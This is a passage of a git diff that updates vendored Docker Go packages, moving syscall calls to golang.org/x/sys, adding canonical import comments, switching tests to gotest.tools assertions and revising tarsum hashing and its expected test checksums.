-func (s StatT) GetLastModification() syscall.Timespec { - return s.Mtim() +// IsDir reports whether s describes a directory. +func (s StatT) IsDir() bool { + return s.mode&syscall.S_IFDIR != 0 +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) } diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go index dee8d30a19..44e048f2a7 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go @@ -1,11 +1,13 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" "syscall" "testing" + + "gotest.tools/assert" ) // TestFromStatT tests fromStatT for a tempfile @@ -15,11 +17,10 @@ func TestFromStatT(t *testing.T) { stat := &syscall.Stat_t{} err := syscall.Lstat(file, stat) + assert.NilError(t, err) s, err := fromStatT(stat) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if stat.Mode != s.Mode() { t.Fatal("got invalid mode") diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go deleted file mode 100644 index 5d85f523cf..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go +++ /dev/null @@ -1,17 +0,0 @@ -// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin - -package system - -import ( - "syscall" -) - -// fromStatT creates a system.StatT type from a syscall.Stat_t type -func fromStatT(s *syscall.Stat_t) (*StatT, error) { - return &StatT{size: s.Size, - mode: uint32(s.Mode), - uid: s.Uid, - gid: s.Gid, - rdev: uint64(s.Rdev), - mtim: s.Mtimespec}, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go index 39490c625c..b2456cb887 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" @@ -8,18 +6,11 @@ import ( ) // StatT type contains status of a file. It contains metadata -// like name, permission, size, etc about a file. +// like permission, size, etc about a file. type StatT struct { - name string - size int64 - mode os.FileMode - modTime time.Time - isDir bool -} - -// Name returns file's name. -func (s StatT) Name() string { - return s.name + mode os.FileMode + size int64 + mtim time.Time } // Size returns file's size. @@ -29,15 +20,30 @@ func (s StatT) Size() int64 { // Mode returns file's permission mode. func (s StatT) Mode() os.FileMode { - return s.mode + return os.FileMode(s.mode) +} + +// Mtim returns file's last modification time. +func (s StatT) Mtim() time.Time { + return time.Time(s.mtim) } -// ModTime returns file's last modification time. -func (s StatT) ModTime() time.Time { - return s.modTime +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + fi, err := os.Stat(path) + if err != nil { + return nil, err + } + return fromStatT(&fi) } -// IsDir returns whether file is actually a directory. -func (s StatT) IsDir() bool { - return s.isDir +// fromStatT converts a os.FileInfo type to a system.StatT type +func fromStatT(fi *os.FileInfo) (*StatT, error) { + return &StatT{ + size: (*fi).Size(), + mode: (*fi).Mode(), + mtim: (*fi).ModTime()}, nil } diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go index 3ae9128468..919a412a7b 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go @@ -1,13 +1,13 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" -import "syscall" +import "golang.org/x/sys/unix" // Unmount is a platform-specific helper function to call // the unmount syscall. func Unmount(dest string) error { - return syscall.Unmount(dest, 0) + return unix.Unmount(dest, 0) } // CommandLineToArgv should not be used on Unix. diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go index 1f311874f4..ee7e0256f3 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go @@ -1,15 +1,17 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "fmt" "unsafe" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) var ( - ntuserApiset = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") - procGetVersionExW = modkernel32.NewProc("GetVersionExW") + ntuserApiset = windows.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") + procGetVersionExW = modkernel32.NewProc("GetVersionExW") + procGetProductInfo = modkernel32.NewProc("GetProductInfo") ) // OSVersion is a wrapper for Windows version information @@ -41,7 +43,7 @@ type osVersionInfoEx struct { func GetOSVersion() OSVersion { var err error osv := OSVersion{} - osv.Version, err = syscall.GetVersion() + osv.Version, err = windows.GetVersion() if err != nil { // GetVersion never fails. panic(err) @@ -52,6 +54,10 @@ func GetOSVersion() OSVersion { return osv } +func (osv OSVersion) ToString() string { + return fmt.Sprintf("%d.%d.%d", osv.MajorVersion, osv.MinorVersion, osv.Build) +} + // IsWindowsClient returns true if the SKU is client // @engine maintainers - this function should not be removed or modified as it // is used to enforce licensing restrictions on Windows. @@ -66,6 +72,22 @@ func IsWindowsClient() bool { return osviex.ProductType == verNTWorkstation } +// IsIoTCore returns true if the currently running image is based off of +// Windows 10 IoT Core. +// @engine maintainers - this function should not be removed or modified as it +// is used to enforce licensing restrictions on Windows. +func IsIoTCore() bool { + var returnedProductType uint32 + r1, _, err := procGetProductInfo.Call(6, 1, 0, 0, uintptr(unsafe.Pointer(&returnedProductType))) + if r1 == 0 { + logrus.Warnf("GetProductInfo failed - assuming this is not IoT: %v", err) + return false + } + const productIoTUAP = 0x0000007B + const productIoTUAPCommercial = 0x00000083 + return returnedProductType == productIoTUAP || returnedProductType == productIoTUAPCommercial +} + // Unmount is a platform-specific helper function to call // the unmount syscall. Not supported on Windows func Unmount(dest string) error { @@ -76,20 +98,20 @@ func Unmount(dest string) error { func CommandLineToArgv(commandLine string) ([]string, error) { var argc int32 - argsPtr, err := syscall.UTF16PtrFromString(commandLine) + argsPtr, err := windows.UTF16PtrFromString(commandLine) if err != nil { return nil, err } - argv, err := syscall.CommandLineToArgv(argsPtr, &argc) + argv, err := windows.CommandLineToArgv(argsPtr, &argc) if err != nil { return nil, err } - defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv)))) + defer windows.LocalFree(windows.Handle(uintptr(unsafe.Pointer(argv)))) newArgs := make([]string, argc) for i, v := range (*argv)[:argc] { - newArgs[i] = string(syscall.UTF16ToString((*v)[:])) + newArgs[i] = string(windows.UTF16ToString((*v)[:])) } return newArgs, nil diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go index 4886b2b9b4..8e78ba6285 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import "testing" diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go index 3d0146b01a..9912a2babb 100644 --- a/vendor/github.com/docker/docker/pkg/system/umask.go +++ b/vendor/github.com/docker/docker/pkg/system/umask.go @@ -1,13 +1,13 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "golang.org/x/sys/unix" ) // Umask sets current process's file mode creation mask to newmask // and returns oldmask. func Umask(newmask int) (oldmask int, err error) { - return syscall.Umask(newmask), nil + return unix.Umask(newmask), nil } diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go index 13f1de1769..fc62388c38 100644 --- a/vendor/github.com/docker/docker/pkg/system/umask_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" // Umask is not supported on the windows platform. func Umask(newmask int) (oldmask int, err error) { diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go index e2eac3b553..ed1b9fad59 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go @@ -1,20 +1,22 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // LUtimesNano is used to change access and modification time of the specified path. -// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm. func LUtimesNano(path string, ts []syscall.Timespec) error { var _path *byte - _path, err := syscall.BytePtrFromString(path) + _path, err := unix.BytePtrFromString(path) if err != nil { return err } - if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS { + if _, _, err := unix.Syscall(unix.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != unix.ENOSYS { return err } diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go index fc8a1aba95..0afe854589 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go @@ -1,24 +1,23 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // LUtimesNano is used to change access and modification time of the specified path. -// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm. func LUtimesNano(path string, ts []syscall.Timespec) error { - // These are not currently available in syscall - atFdCwd := -100 - atSymLinkNoFollow := 0x100 + atFdCwd := unix.AT_FDCWD var _path *byte - _path, err := syscall.BytePtrFromString(path) + _path, err := unix.BytePtrFromString(path) if err != nil { return err } - - if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS { + if _, _, err := unix.Syscall6(unix.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), unix.AT_SYMLINK_NOFOLLOW, 0, 0); err != 0 && err != unix.ENOSYS { return err } diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go index a73ed118c9..cc0e7cbf1f 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go index 139714544d..095e072e1d 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go @@ -1,6 +1,6 @@ // +build !linux,!freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import "syscall" diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go index d2e2c05799..66d4895b27 100644 --- a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go @@ -1,63 +1,29 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" - "unsafe" -) +import "golang.org/x/sys/unix" // Lgetxattr retrieves the value of the extended attribute identified by attr // and associated with the given path in the file system. // It will returns a nil slice and nil error if the xattr is not set. func Lgetxattr(path string, attr string) ([]byte, error) { - pathBytes, err := syscall.BytePtrFromString(path) - if err != nil { - return nil, err - } - attrBytes, err := syscall.BytePtrFromString(attr) - if err != nil { - return nil, err - } - dest := make([]byte, 128) - destBytes := unsafe.Pointer(&dest[0]) - sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) - if errno == syscall.ENODATA { + sz, errno := unix.Lgetxattr(path, attr, dest) + if errno == unix.ENODATA { return nil, nil } - if errno == syscall.ERANGE { + if errno == unix.ERANGE { dest = make([]byte, sz) - destBytes := unsafe.Pointer(&dest[0]) - sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + sz, errno = unix.Lgetxattr(path, attr, dest) } - if errno != 0 { + if errno != nil { return nil, errno } return dest[:sz], nil } -var _zero uintptr - // Lsetxattr sets the value of the extended attribute identified by attr // and associated with the given path in the file system. func Lsetxattr(path string, attr string, data []byte, flags int) error { - pathBytes, err := syscall.BytePtrFromString(path) - if err != nil { - return err - } - attrBytes, err := syscall.BytePtrFromString(attr) - if err != nil { - return err - } - var dataBytes unsafe.Pointer - if len(data) > 0 { - dataBytes = unsafe.Pointer(&data[0]) - } else { - dataBytes = unsafe.Pointer(&_zero) - } - _, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0) - if errno != 0 { - return errno - } - return nil + return unix.Lsetxattr(path, attr, data, flags) } diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go index 0114f2227c..d780a90cd3 100644 --- a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package system +package system // import "github.com/docker/docker/pkg/system" // Lgetxattr is not supported on platforms other than linux. func Lgetxattr(path string, attr string) ([]byte, error) { diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go index 09eb393ab7..e835893746 100644 --- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go @@ -1,6 +1,6 @@ // Package tailfile provides helper functions to read the nth lines of any // ReadSeeker. -package tailfile +package tailfile // import "github.com/docker/docker/pkg/tailfile" import ( "bytes" @@ -16,7 +16,7 @@ var eol = []byte("\n") // ErrNonPositiveLinesNumber is an error returned if the lines number was negative. var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive") -//TailFile returns last n lines of reader f (could be a fil). +//TailFile returns last n lines of reader f (could be a nil). func TailFile(f io.ReadSeeker, n int) ([][]byte, error) { if n <= 0 { return nil, ErrNonPositiveLinesNumber diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go index 31217c036c..c74bb02e16 100644 --- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go @@ -1,4 +1,4 @@ -package tailfile +package tailfile // import "github.com/docker/docker/pkg/tailfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go index b42983e984..bc7d84df4e 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" // BuilderContext is an interface extending TarSum by adding the Remove method. // In general there was concern about adding this method to TarSum itself diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go index f54bf3a1bd..86adb442d6 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go index 5abf5e7ba3..01d4ed59b2 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go @@ -1,6 +1,10 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" -import "sort" +import ( + "runtime" + "sort" + "strings" +) // FileInfoSumInterface provides an interface for accessing file checksum // information within a tar file. This info is accessed through interface @@ -35,8 +39,11 @@ type FileInfoSums []FileInfoSumInterface // GetFile returns the first FileInfoSumInterface with a matching name. func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface { + // We do case insensitive matching on Windows as c:\APP and c:\app are + // the same. See issue #33107. for i := range fis { - if fis[i].Name() == name { + if (runtime.GOOS == "windows" && strings.EqualFold(fis[i].Name(), name)) || + (runtime.GOOS != "windows" && fis[i].Name() == name) { return fis[i] } } diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go index bb700d8bde..e6ebd9cc86 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import "testing" @@ -46,7 +46,7 @@ func TestSortFileInfoSums(t *testing.T) { fis = newFileInfoSums() fis.SortByPos() if fis[0].Pos() != 0 { - t.Errorf("sorted fileInfoSums by Pos should order them by position.") + t.Error("sorted fileInfoSums by Pos should order them by position.") } fis = newFileInfoSums() @@ -56,7 +56,7 @@ func TestSortFileInfoSums(t *testing.T) { t.Errorf("Expected %q, got %q", expected, gotFileInfoSum) } if fis.GetFile("noPresent") != nil { - t.Errorf("Should have return nil if name not found.") + t.Error("Should have return nil if name not found.") } } diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go index 154788db82..5542e1b2c0 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go @@ -15,7 +15,7 @@ // constraining the ordering or manipulation of the files during the creation or // unpacking of the archive, nor include additional metadata state about the file // system attributes. -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" @@ -160,6 +160,11 @@ func (sth simpleTHash) Hash() hash.Hash { return sth.h() } func (ts *tarSum) encodeHeader(h *tar.Header) error { for _, elem := range ts.headerSelector.selectHeaders(h) { + // Ignore these headers to be compatible with versions + // before go 1.10 + if elem[0] == "gname" || elem[0] == "uname" { + elem[1] = "" + } if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil { return err } @@ -219,6 +224,10 @@ func (ts *tarSum) Read(buf []byte) (int, error) { ts.first = false } + if _, err := ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + currentHeader, err := ts.tarR.Next() if err != nil { if err == io.EOF { @@ -232,21 +241,19 @@ func (ts *tarSum) Read(buf []byte) (int, error) { return 0, err } ts.finished = true - return n, nil + return ts.bufWriter.Read(buf) } - return n, err + return 0, err } - ts.currentFile = path.Clean(currentHeader.Name) + + ts.currentFile = path.Join(".", path.Join("/", currentHeader.Name)) if err := ts.encodeHeader(currentHeader); err != nil { return 0, err } if err := ts.tarW.WriteHeader(currentHeader); err != nil { return 0, err } - if _, err := ts.tarW.Write(buf2[:n]); err != nil { - return 0, err - } - ts.tarW.Flush() + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { return 0, err } @@ -254,7 +261,7 @@ func (ts *tarSum) Read(buf []byte) (int, error) { return ts.bufWriter.Read(buf) } - return n, err + return 0, err } // Filling the hash buffer @@ -266,7 +273,6 @@ func (ts *tarSum) Read(buf []byte) (int, error) { if _, err = ts.tarW.Write(buf2[:n]); err != nil { return 0, err } - ts.tarW.Flush() // Filling the output writer if _, err = io.Copy(ts.writer, ts.bufTar); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go index 86df0e2b89..435b91c780 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" @@ -16,6 +16,9 @@ import ( "os" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) type testLayer struct { @@ -66,19 +69,19 @@ var testLayers = []testLayer{ { // this tar has two files with the same path filename: "testdata/collision/collision-0.tar", - tarsum: "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"}, + tarsum: "tarsum+sha256:7cabb5e9128bb4a93ff867b9464d7c66a644ae51ea2e90e6ef313f3bef93f077"}, { // this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above filename: "testdata/collision/collision-1.tar", - tarsum: "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"}, + tarsum: "tarsum+sha256:805fd393cfd58900b10c5636cf9bab48b2406d9b66523122f2352620c85dc7f9"}, { // this tar has newer of collider-0.tar, ensuring is has different hash filename: "testdata/collision/collision-2.tar", - tarsum: "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"}, + tarsum: "tarsum+sha256:85d2b8389f077659d78aca898f9e632ed9161f553f144aef100648eac540147b"}, { // this tar has newer of collider-1.tar, ensuring is has different hash filename: "testdata/collision/collision-3.tar", - tarsum: "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"}, + tarsum: "tarsum+sha256:cbe4dee79fe979d69c16c2bccd032e3205716a562f4a3c1ca1cbeed7b256eb19"}, { options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) tarsum: "tarsum+md5:0d7529ec7a8360155b48134b8e599f53", @@ -222,17 +225,13 @@ func TestNewTarSumForLabel(t *testing.T) { func TestEmptyTar(t *testing.T) { // Test without gzip. ts, err := emptyTarSum(false) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) zeroBlock := make([]byte, 1024) buf := new(bytes.Buffer) n, err := io.Copy(buf, ts) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) { t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n) @@ -247,19 +246,16 @@ func TestEmptyTar(t *testing.T) { // Test with gzip. ts, err = emptyTarSum(true) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf.Reset() - n, err = io.Copy(buf, ts) - if err != nil { - t.Fatal(err) - } + _, err = io.Copy(buf, ts) + assert.NilError(t, err) bufgz := new(bytes.Buffer) gz := gzip.NewWriter(bufgz) n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock)) + assert.NilError(t, err) gz.Close() gzBytes := bufgz.Bytes() @@ -279,10 +275,7 @@ func TestEmptyTar(t *testing.T) { } resultSum = ts.Sum(nil) - - if resultSum != expectedSum { - t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) - } + assert.Check(t, is.Equal(expectedSum, resultSum)) } var ( @@ -443,7 +436,7 @@ func TestIteration(t *testing.T) { []byte(""), }, { - "tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef", + "tarsum.dev+sha256:862964db95e0fa7e42836ae4caab3576ab1df8d275720a45bdd01a5a3730cc63", VersionDev, &tar.Header{ Name: "another.txt", @@ -459,7 +452,7 @@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd", + "tarsum.dev+sha256:4b1ba03544b49d96a32bacc77f8113220bd2f6a77e7e6d1e7b33cd87117d88e7", VersionDev, &tar.Header{ Name: "xattrs.txt", @@ -477,7 +470,7 @@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760", + "tarsum.dev+sha256:410b602c898bd4e82e800050f89848fc2cf20fd52aa59c1ce29df76b878b84a6", VersionDev, &tar.Header{ Name: "xattrs.txt", @@ -495,7 +488,7 @@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa", + "tarsum+sha256:b1f97eab73abd7593c245e51070f9fbdb1824c6b00a0b7a3d7f0015cd05e9e86", Version0, &tar.Header{ Name: "xattrs.txt", diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go index 2882286854..aa1f171862 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go @@ -1,8 +1,9 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" "errors" + "io" "sort" "strconv" "strings" @@ -21,6 +22,13 @@ const ( VersionDev ) +// WriteV1Header writes a tar header to a writer in V1 tarsum format. +func WriteV1Header(h *tar.Header, w io.Writer) { + for _, elem := range v1TarHeaderSelect(h) { + w.Write([]byte(elem[0] + elem[1])) + } +} + // VersionLabelForChecksum returns the label for the given tarsum // checksum, i.e., everything before the first `+` character in // the string or an empty string if no label separator is found. diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go index 88e0a5783c..79b9cc9107 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go index 9727ecde3e..c4c45a35e7 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go index f5262bccf5..87bca8d4ac 100644 --- a/vendor/github.com/docker/docker/pkg/term/ascii.go +++ b/vendor/github.com/docker/docker/pkg/term/ascii.go @@ -1,4 +1,4 @@ -package term +package term // import "github.com/docker/docker/pkg/term" import ( "fmt" @@ -59,7 +59,7 @@ next: return nil, fmt.Errorf("Unknown character: '%s'", key) } } else { - codes = append(codes, byte(key[0])) + codes = append(codes, key[0]) } } return codes, nil diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go index 4a1e7f302c..665ab1552f 100644 --- a/vendor/github.com/docker/docker/pkg/term/ascii_test.go +++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go @@ -1,43 +1,25 @@ -package term +package term // import "github.com/docker/docker/pkg/term" -import "testing" +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) func TestToBytes(t *testing.T) { codes, err := ToBytes("ctrl-a,a") - if err != nil { - t.Fatal(err) - } - if len(codes) != 2 { - t.Fatalf("Expected 2 codes, got %d", len(codes)) - } - if codes[0] != 1 || codes[1] != 97 { - t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1]) - } + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]byte{1, 97}, codes)) - codes, err = ToBytes("shift-z") - if err == nil { - t.Fatalf("Expected error, got none") - } + _, err = ToBytes("shift-z") + assert.Check(t, is.ErrorContains(err, "")) codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o") - if err != nil { - t.Fatal(err) - } - if len(codes) != 4 { - t.Fatalf("Expected 4 codes, got %d", len(codes)) - } - if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 { - t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3]) - } + assert.NilError(t, err) + assert.Check(t, 